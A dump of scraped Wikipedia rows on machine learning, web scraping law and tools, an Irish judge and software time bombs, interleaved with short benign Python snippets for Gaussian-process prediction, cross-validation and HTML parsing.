mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s. 
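The Gaussian process description above (predicting at a new point from the observed points and a covariance function) can be sketched directly with NumPy: the posterior mean is a covariance-weighted combination of the observed outputs. The squared-exponential kernel, its length scale, the noise level, and the toy data are all assumptions of this sketch.

import numpy as np

def rbf_kernel(a, b, length_scale=1.0):
    # Squared-exponential covariance between two sets of 1-D inputs
    d = a[:, None] - b[None, :]
    return np.exp(-0.5 * (d / length_scale) ** 2)

x_obs = np.array([-3.0, -1.0, 0.5, 2.0])
y_obs = np.sin(x_obs)                          # observed input-output examples
x_new = np.array([1.0])                        # where we want a prediction

noise = 1e-6
K = rbf_kernel(x_obs, x_obs) + noise * np.eye(len(x_obs))
k_star = rbf_kernel(x_new, x_obs)
posterior_mean = k_star @ np.linalg.solve(K, y_obs)   # weights observations by covariance
print(posterior_mean, "vs true value", np.sin(x_new))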
92 93 Machine learning techniques have, conversely, been used to improve the performance of genetic and evolutionary algorithms. 94 The theory of belief functions, also referred to as evidence theory or Dempster-Shafer theory, is a general framework for reasoning with uncertainty, with understood connections to other frameworks such as probability, possibility and imprecise probability theories. These theoretical frameworks can be thought of as a kind of learner and have some analogous properties of how evidence is combined (e.g., Dempster's rule of combination), much as a pmf-based Bayesian approach would combine probabilities. However, there are many caveats to these belief functions when compared to Bayesian approaches for incorporating ignorance and uncertainty quantification. Belief function approaches implemented within the machine learning domain typically leverage a fusion of various ensemble methods to better handle the learner's decision boundary, low samples, and ambiguous class issues that standard machine learning approaches tend to have difficulty resolving. 4 9 However, the computational complexity of these algorithms is dependent on the number of propositions (classes), and can lead to a much higher computation time when compared to other machine learning approaches. Typically, machine learning models require a high quantity of reliable data to perform accurate predictions. When training a machine learning model, machine learning engineers need to target and collect a large and representative sample of data. Data from the training set can be as varied as a corpus of text, a collection of images, sensor data, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Trained models derived from biased or non-evaluated data can result in skewed or undesired predictions. Biased models may result in detrimental outcomes, thereby furthering the negative impacts on society or objectives. Algorithmic bias is a potential result of data not being fully prepared for training. Machine learning ethics is becoming a field of study and, notably, is becoming integrated within machine learning engineering teams. Federated learning is an adapted form of distributed artificial intelligence for training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google. 95 There are many applications for machine learning. In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million. 98 Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.
99 In 2010, The Wall Street Journal wrote about the firm Rebellion Research and its use of machine learning to predict the financial crisis. 100 In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software. 101 In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists. 102 In 2019, Springer Nature published the first research book created using machine learning. 103 In 2020, machine learning technology was used to help make diagnoses and aid researchers in developing a cure for COVID-19. 104 Machine learning was recently applied to predict the pro-environmental behavior of travelers. 105 Recently, machine learning technology was also applied to optimize smartphones' performance and thermal behavior based on the user's interaction with the phone. 106 107 108 When applied correctly, machine learning algorithms (MLAs) can utilize a wide range of company characteristics to predict stock returns without overfitting. By employing effective feature engineering and combining forecasts, MLAs can generate results that far surpass those obtained from basic linear techniques like OLS. 109 Recent advancements in machine learning have extended into the field of quantum chemistry, where novel algorithms now enable the prediction of solvent effects on chemical reactions, thereby offering new tools for chemists to tailor experimental conditions for optimal outcomes. 110 Machine learning is becoming a useful tool to investigate and predict evacuation decision-making in large-scale and small-scale disasters. Different solutions have been tested to predict if and when householders decide to evacuate during wildfires and hurricanes. 111 112 113 Other applications have focused on pre-evacuation decisions in building fires. 114 115 Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results. 116 117 118 Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems. 119 The "black box theory" poses yet another significant challenge. Black box refers to a situation where the algorithm or the process of producing an output is entirely opaque, meaning that even the coders of the algorithm cannot audit the pattern that the machine extracted from the data. 120 The House of Lords Select Committee claimed that an “intelligence system” that could have a “substantial impact on an individual’s life” would not be considered acceptable unless it provided “a full and satisfactory explanation for the decisions” it makes. 120 In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision. 121 Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested. 122 123 Microsoft's Bing Chat chatbot has been reported to produce hostile and offensive responses against its users. 124 Machine learning has been used as a strategy to update the evidence related to a systematic review and to address the increased reviewer burden related to the growth of biomedical literature. 
While it has improved with training sets, it has not yet developed sufficiently to reduce the workload burden without limiting the necessary sensitivity for the research findings themselves. 125 Different machine learning approaches can suffer from different data biases. A machine learning system trained specifically on current customers may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on human-made data, machine learning is likely to pick up the constitutional and unconscious biases already present in society. 126 Language models learned from data have been shown to contain human-like biases. 127 128 In an experiment carried out by ProPublica, an investigative journalism organization, a machine learning algorithm's insight into the recidivism rates among prisoners falsely flagged black defendants as high risk twice as often as white defendants. 129 In 2015, Google Photos would often tag black people as gorillas, 129 and in 2018, this still was not well resolved: Google reportedly was still using the workaround of removing all gorillas from the training data and thus was not able to recognize real gorillas at all. 130 Similar issues with recognizing non-white people have been found in many other systems. 131 In 2016, Microsoft tested Tay, a chatbot that learned from Twitter, and it quickly picked up racist and sexist language. 132 Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains. 133 Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good, is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "there's nothing artificial about AI. It's inspired by people, it's created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility." 134 Explainable AI (XAI), or Interpretable AI, or Explainable Machine Learning (XML), is artificial intelligence (AI) in which humans can understand the decisions or predictions made by the AI. 135 It contrasts with the "black box" concept in machine learning, where even its designers cannot explain why an AI arrived at a specific decision. 136 By refining the mental models of users of AI-powered systems and dismantling their misconceptions, XAI promises to help users perform more effectively. XAI may be an implementation of the social right to explanation. Settling on a bad, overly complex theory gerrymandered to fit all the past training data is known as overfitting. Many systems attempt to reduce overfitting by rewarding a theory in accordance with how well it fits the data but penalizing the theory in accordance with how complex the theory is. 137 Learners can also disappoint by "learning the wrong lesson". A toy example is that an image classifier trained only on pictures of brown horses and black cats might conclude that all brown patches are likely to be horses. 138 A real-world example is that, unlike humans, current image classifiers often do not primarily make judgments from the spatial relationship between components of the picture, and they learn relationships between pixels that humans are oblivious to, but that still correlate with images of certain types of real objects. Modifying these patterns on a legitimate image can result in "adversarial" images that the system misclassifies. 
139 140 Adversarial vulnerabilities can also result in nonlinear systems, or from non-pattern perturbations. For some systems, it is possible to change the output by only changing a single adversarially chosen pixel. 141 Machine learning models are often vulnerable to manipulation and/or evasion via adversarial machine learning. 142 Researchers have demonstrated how backdoors can be placed undetectably into machine learning classifiers (e.g., models that classify posts into categories such as "spam" and well-visible "not spam") that are often developed and/or trained by third parties. Parties can change the classification of any input, including in cases for which a type of data software transparency is provided, possibly including white-box access. 143 144 145 Classification machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data into a training and a test set (conventionally a 2/3 training set and 1/3 test set designation) and evaluates the performance of the trained model on the test set. In comparison, the K-fold cross-validation method randomly partitions the data into K subsets, and then K experiments are performed, each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, the bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy. 146 In addition to overall accuracy, investigators frequently report sensitivity and specificity, meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC). 147 Machine learning poses a host of ethical questions. Systems that are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices. 148 For example, in 1988, the UK's Commission for Racial Equality found that St. George's Medical School had been using a computer program trained from data of previous admissions staff and that this program had denied nearly 60 candidates who were found to either be women or have non-European sounding names. 126 Using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants by similarity to previous successful applicants. 149 150 Another example involves predictive policing company Geolitica's predictive algorithm, which resulted in “disproportionately high levels of over-policing in low-income and minority communities” after being trained with historical crime data. 129 While responsible collection of data and documentation of algorithmic rules used by a system is considered a critical part of machine learning, some researchers blame the lack of participation and representation of minority populations in the field of AI for machine learning's vulnerability to biases. 
151 In fact, according to research carried out by the Computing Research Association (CRA) in 2021, “female faculty merely make up 16.1% of all faculty members who focus on AI among several universities around the world.” 152 Furthermore, among the group of “new U.S. resident AI PhD graduates,” 45% identified as white, 22.4% as Asian, 3.2% as Hispanic, and 2.4% as African American, which further demonstrates a lack of diversity in the field of AI. 152 AI can be well-equipped to make decisions in technical fields, which rely heavily on data and historical information. These decisions rely on objectivity and logical reasoning. 153 Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases. 154 155 Other forms of ethical challenges, not related to personal biases, are seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. 156 This is especially true in the United States, where there is a long-standing ethical dilemma of improving health care but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is potential for machine learning in health care to provide professionals an additional tool to diagnose, medicate, and plan recovery paths for patients, but this requires these biases to be mitigated. 157 Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of nonlinear hidden units. 158 By 2019, graphics processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI. 159 OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months. 160 161 A physical neural network or neuromorphic computer is a type of artificial neural network in which an electrically adjustable material is used to emulate the function of a neural synapse. "Physical" neural network is used to emphasize the reliance on physical hardware used to emulate neurons, as opposed to software-based approaches. More generally, the term is applicable to other artificial neural networks in which a memristor or other electrically adjustable resistance material is used to emulate a neural synapse. 162 163 Embedded machine learning is a sub-field of machine learning where the machine learning model is run on embedded systems with limited computing resources, such as wearable computers, edge devices and microcontrollers. 164 165 166 Running machine learning models on embedded devices removes the need for transferring and storing data on cloud servers for further processing, thereby reducing the data breaches and privacy leaks that happen because of transferring data, and also minimizes theft of intellectual property, personal data and business secrets. Embedded machine learning can be applied through several techniques, including hardware acceleration, 167 168 using approximate computing, 169 optimization of machine learning models and many more. 
170 171 Pruning, quantization, knowledge distillation, low-rank factorization, network architecture search (NAS) and parameter sharing are a few of the techniques used for optimization of machine learning models. Software suites containing a variety of machine learning algorithms include the following: |
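The scraped passage above describes the holdout method (conventionally a 2/3 training / 1/3 test split) and K-fold cross-validation for assessing model accuracy. Below is a minimal sketch of both splitting schemes in plain Python; the toy dataset and the trivial majority-class "model" are hypothetical stand-ins added purely for illustration and are not part of the scraped source.

import random

def holdout_split(data, train_frac=2/3, seed=0):
    # Shuffle, then keep the first train_frac of the data for training and the rest for testing.
    rng = random.Random(seed)
    shuffled = data[:]
    rng.shuffle(shuffled)
    cut = int(len(shuffled) * train_frac)
    return shuffled[:cut], shuffled[cut:]

def k_fold_indices(n, k=5, seed=0):
    # Partition indices 0..n-1 into k folds; yield (train, test) index lists for each experiment.
    rng = random.Random(seed)
    idx = list(range(n))
    rng.shuffle(idx)
    folds = [idx[i::k] for i in range(k)]
    for i in range(k):
        test_idx = folds[i]
        train_idx = [j for f, fold in enumerate(folds) if f != i for j in fold]
        yield train_idx, test_idx

# Hypothetical toy dataset of (feature, label) pairs.
toy = [(x, int(x > 5)) for x in range(20)]
train, test = holdout_split(toy)
print(len(train), "training examples,", len(test), "test examples")

for train_idx, test_idx in k_fold_indices(len(toy), k=5):
    # Each of the K experiments trains on K-1 folds and evaluates on the held-out fold.
    majority = round(sum(toy[i][1] for i in train_idx) / len(train_idx))  # trivial stand-in "model"
    accuracy = sum(int(toy[i][1] == majority) for i in test_idx) / len(test_idx)
    print("fold accuracy:", round(accuracy, 2))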
227 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_French-language_sources_(fr) | This is a tracking category for CS1 citations that use the parameter language fr to identify a source in French. Pages in this category should only be added by CS1 templates and Module:Citation CS1. The following 200 pages are in this category, out of approximately 168,206 total. This list may not reflect recent changes. The following 10 files are in this category, out of 10 total. |
228 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:SpecialPages | This page contains a list of special pages. Most of the content of these pages is automatically generated and cannot be edited. To suggest a change to the parts that can be edited, find the appropriate text on Special:AllMessages and then request your change on the talk page of the message (using editprotected to draw the attention of administrators). You can also see what message names are used on a page by adding ?uselang=qqx to the end of its URL, e.g. https://en.wikipedia.org/wiki/Special:SpecialPages?uselang=qqx will show (specialpages-summary) in place of this message, which allows you to find MediaWiki:Specialpages-summary. For an index of special pages, see Help:SpecialPages. |
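The entry above mentions that appending ?uselang=qqx to a MediaWiki URL makes the page display its interface message names (such as (specialpages-summary)). A quick way to try that from Python is with the requests library already imported in this notebook; the URL comes from the entry itself, and the check string is only an illustrative assumption about what the response will contain.

import requests

url = "https://en.wikipedia.org/wiki/Special:SpecialPages"
# uselang=qqx asks MediaWiki to show message names instead of translated interface text.
resp = requests.get(url, params={"uselang": "qqx"}, timeout=10)
print(resp.status_code)
print("(specialpages-summary)" in resp.text)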
229 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Michael_Hanna_(judge) | Michael Anthony Patrick Hanna is a retired Irish judge who served as a Judge of the High Court from 2004 to 2023. Hanna originates from Belfast and was educated at St MacNissi's College. His father was Frank Hanna, a Northern Ireland Labour Party MP. 1 He was educated at Trinity College Dublin and the King's Inns. 2 He is a former auditor of the College Historical Society. 3 He became a barrister in 1976 and a senior counsel in 1996. 2 Hanna's practice was focused on the Dublin and South-Eastern circuits, where he specialised in personal injury cases and the law of tort. 2 Criminal cases also formed part of his practice. 4 Hanna was appointed to the High Court in 2004. 5 6 He was appointed following recommendation by the Judicial Appointments Advisory Board. 7 He presided over a planning law case involving Van Morrison and his wife Michelle Rocca in 2010. 8 He was the judge in a 2011 case taken by Ryanair against a German ticket sale website, in which he held that ticket scraping was a breach of Ryanair's website terms. This was considered to be the first Irish case involving the enforceability of online terms of service. 9 He often acted as judge at the Court of Criminal Appeal, prior to its disbandment following the establishment of the Court of Appeal. 10 He frequently heard personal injuries cases when he was on the bench of the High Court. He applied a test of "ordinary common sense" to assess evidence in a personal injuries case involving a woman who had slipped in a car park. 11 This test was endorsed in a judgment of Mary Irvine in the Court of Appeal. 12 His final sitting as a judge was on 13 July 2023. 13 14 He became ill while in Spain in 2014 and was in an induced coma. He was unable to hear cases for a period of time following. 10 Hanna is a singer of opera. 15 |
230 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-30 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
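The scraped article above contrasts grep-style regular-expression matching against DOM parsing (with XPath or an embedded browser control) as ways of pulling data out of a fetched page. The sketch below shows both styles using requests, re, and BeautifulSoup, which are already installed at the top of this notebook; the target URL and the patterns are illustrative assumptions rather than part of the original scraping pipeline.

import re
import requests
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"  # illustrative target
html = requests.get(url, timeout=10).text

# 1) grep/regex style: pull absolute links straight out of the raw HTML.
#    Fast, but brittle, because it knows nothing about the document structure.
hrefs = re.findall(r'href="(https?://[^"]+)"', html)
print("regex found", len(hrefs), "absolute links")

# 2) DOM-parsing style: build a tree with BeautifulSoup, then query elements.
#    More robust to markup quirks and lets the search be scoped to specific tags.
soup = BeautifulSoup(html, "html5lib")
paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")]
print("DOM parse found", len(paragraphs), "paragraphs")
if paragraphs:
    print(paragraphs[0][:120])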
231 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Time_bomb_(software) | In computer software, a time bomb is part of a computer program that has been written so that it will start or stop functioning after a predetermined date or time is reached. The term "time bomb" does not refer to a program that stops functioning a specific number of days after it is installed; instead, the term "trialware" applies. Time bombs are commonly used in beta (pre-release) software when the manufacturer of the software does not want the beta version being used after the final release date. One example of time bomb software would be Microsoft's Windows Vista Beta 2, which was programmed to expire on May 31, 2007. 1 The time limits on time bomb software are not usually as heavily enforced as they are on trial software, since time bomb software does not usually implement secure clock functions. The first use of a time bomb in software may have been in 1979 with the Scribe markup language and word processing system, developed by Brian Reid. Reid sold Scribe to a software company called Unilogic (later renamed Scribe Systems 2 ), and agreed to insert a set of time-dependent functions (called "time bombs") that would deactivate freely copied versions of the program after a 90 day expiration date. To avoid deactivation, users paid the software company, which then issued a code that defused the internal time bomb feature. 3 Richard Stallman saw this as a betrayal of the programmer ethos. Instead of honoring the notion of share-and-share alike, Reid had inserted a way for companies to compel programmers to pay for information access 4 (see Events leading to GNU). The main differences between logic bombs and time bombs is that a logic bomb may have a timing function implemented into it as a failsafe if the conditions are not met in a certain time period (it may delete itself or activate its payload using the timing system), while time bombs only use timing functions to (de)activate themselves. Time bombs, once activated, will unload their payload (which may be malicious) in a similar way logic bombs deliver their payloads to the target. The main difference between both time and logic bombs, and fork bombs, is that a fork bomb has no payload per se, and instead does its damage by continually replicating itself to deplete available system resources. This computer-programming-related article is a stub. You can help Wikipedia by expanding it. |
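The entry above describes a software time bomb as code that simply stops working once a predetermined calendar date is reached, unlike trialware, which counts days since installation, and unlike a logic bomb, which waits on a condition. Here is a minimal, hypothetical sketch of that mechanism in Python; the expiry date echoes the Windows Vista Beta 2 example and the messages are made up for illustration.

from datetime import date

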